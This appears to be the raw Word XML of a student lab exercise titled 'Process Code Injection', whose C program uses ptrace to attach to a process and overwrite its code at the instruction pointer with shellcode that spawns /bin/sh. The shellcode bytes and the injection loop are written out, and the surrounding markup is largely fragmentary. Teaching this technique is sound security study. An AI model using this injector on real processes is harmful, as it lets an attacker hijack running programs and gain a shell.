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42E9" w14:textId="35A73181" w:rsidR="003E4833" w:rsidRDefault="003E48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Exp </w:t>
      </w:r>
      <w:r w:rsidR="006C702F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w: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="006C702F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process Code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC0188" w14:textId="73EC35D6" w:rsidR="003E4833" w:rsidRPr="003E4833" w:rsidRDefault="003E483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14:paraId="5D30B226" w14:textId="5226F149" w:rsidR="003E4833" w:rsidRPr="006C702F" w:rsidRDefault="006C70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&gt;//C standard input output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stdlib.h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&gt;//C Standard General Utilities Library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string.h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&gt;//C string lib header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unistd.h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&gt;//standard symbolic constants and types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wait.h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&gt;//declarations for waiting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ptrace.h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&gt;//gives access to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ptrace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functionality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include &lt;sys/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user.h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&gt;//gives ref to regs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//The shellcode that calls /bin/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 shellcode[]={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"\x31\xc0\x48\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xbb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\xd1\x9d\x96\x91\xd0\x8c\x97"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"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"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//header for our program.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header()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("----Memory bytecode injector-----\n");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//main program notice we take command line options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argc,char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**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int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i,size,pid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struct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user_regs_struct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reg;//struct that gives access to registers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                //note that this regs will be in x64 for me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                //unless your using 32bit then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eip,eax,edx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etc...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char*buff;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header();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//we get the command line options and assign them appropriately!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pid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atoi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size=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(shellcode);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//allocate a char size memory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buff=(char*)malloc(size);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//fill the buff memory with 0s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upto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size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memset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(buff,0x0,size);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//copy shellcode from source to destination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memcpy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buff,shellcode,sizeof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(shellcode));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//attach process of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pid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ptrace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(PTRACE_ATTACH,pid,0,0);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//wait for child to change state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wait((int*)0); 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//get process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pid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registers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i.e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Copy the process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pid's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general-purpose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//or floating-point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registers,respectively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//to the address reg in the tracer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ptrace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(PTRACE_GETREGS,pid,0,&amp;reg);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("Writing EIP 0x%x, process %d\n",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reg.rip,pid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//Copy the word data to the address buff in the process's memory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for(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size;i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++){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ptrace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PTRACE_POKETEXT,pid,reg.rip+i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,*(int*)(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buff+i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//detach from the process and free buff memory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ptrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(PTRACE_DETACH,pid,0,0);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free(buff);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0;</w:t>
      </w:r>
      <w:r w:rsidRPr="006C702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C70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741C512C" w14:textId="42A93316" w:rsidR="00D84F11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40967" w14:textId="557A29E7" w:rsidR="00D84F11" w:rsidRPr="003E0A73" w:rsidRDefault="00D84F11" w:rsidP="00D84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08B4E3A0" w14:textId="01C5C756" w:rsidR="00D84F11" w:rsidRDefault="003E0A73" w:rsidP="00D84F11">
      <w:pP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Terminal 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37352E" w14:textId="716868B4" w:rsidR="003E0A73" w:rsidRDefault="003E0A73" w:rsidP="00D84F11">
      <w:pP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4D85AF29" wp14:editId="6487E3FC">
            <wp:extent cx="4610337" cy="806491"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62186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60039" name="Picture 621860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DAC" w14:textId="12C9FAA6" w:rsidR="003E0A73" w:rsidRPr="003E4833" w:rsidRDefault="003E0A73" w:rsidP="00D84F1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Terminal 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BA4300" w14:textId="1F28DF39" w:rsidR="00D84F11" w:rsidRPr="003E4833" w:rsidRDefault="003E0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085B1B" wp14:editId="22249FAD">
            <wp:extent cx="3194214" cy="844593"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1263307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7485" name="Picture 1263307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F11" w:rsidRPr="003E4833" w:rsidSect="001C3E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E12FA" w14:textId="77777777" w:rsidR="0057209D" w:rsidRDefault="0057209D" w:rsidP="003E4833">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="11A331B6" w14:textId="77777777" w:rsidR="0057209D" w:rsidRDefault="0057209D" w:rsidP="003E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A85AE" w14:textId="77777777" w:rsidR="00802ACC" w:rsidRDefault="00802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7C199" w14:textId="77777777" w:rsidR="00802ACC" w:rsidRDefault="00802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1B8AE" w14:textId="77777777" w:rsidR="00802ACC" w:rsidRDefault="00802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2E419" w14:textId="77777777" w:rsidR="0057209D" w:rsidRDefault="0057209D" w:rsidP="003E4833">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0F8B9E46" w14:textId="77777777" w:rsidR="0057209D" w:rsidRDefault="0057209D" w:rsidP="003E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D4C08" w14:textId="77777777" w:rsidR="00802ACC" w:rsidRDefault="00802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B997" w14:textId="77777777" w:rsidR="00802ACC" w:rsidRPr="00A7177C" w:rsidRDefault="00802ACC" w:rsidP="00802ACC">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Reg no: 210701083                                                                                                   Name: Hemanth Kumar D</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="11EADCEA" w14:textId="29A0A95A" w:rsidR="003E4833" w:rsidRPr="00802ACC" w:rsidRDefault="003E4833" w:rsidP="00802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7E7A5" w14:textId="77777777" w:rsidR="00802ACC" w:rsidRDefault="00802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3"/>
    <w:rsid w:val="00041AD1"/>
    <w:rsid w:val="001C3E63"/>
    <w:rsid w:val="001C65E2"/>
    <w:rsid w:val="003B0379"/>
    <w:rsid w:val="003E0A73"/>
    <w:rsid w:val="003E4833"/>
    <w:rsid w:val="00463FFD"/>
    <w:rsid w:val="004D083C"/>
    <w:rsid w:val="0057209D"/>
    <w:rsid w:val="006B4B54"/>
    <w:rsid w:val="006C702F"/>
    <w:rsid w:val="007042F5"/>
    <w:rsid w:val="00802ACC"/>
    <w:rsid w:val="00D84F11"/>
    <w:rsid w:val="00F1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675E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{76C54483-9C84-43B5-B7CE-1D700B6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33"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Foot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2024-05-17T18:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T18:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>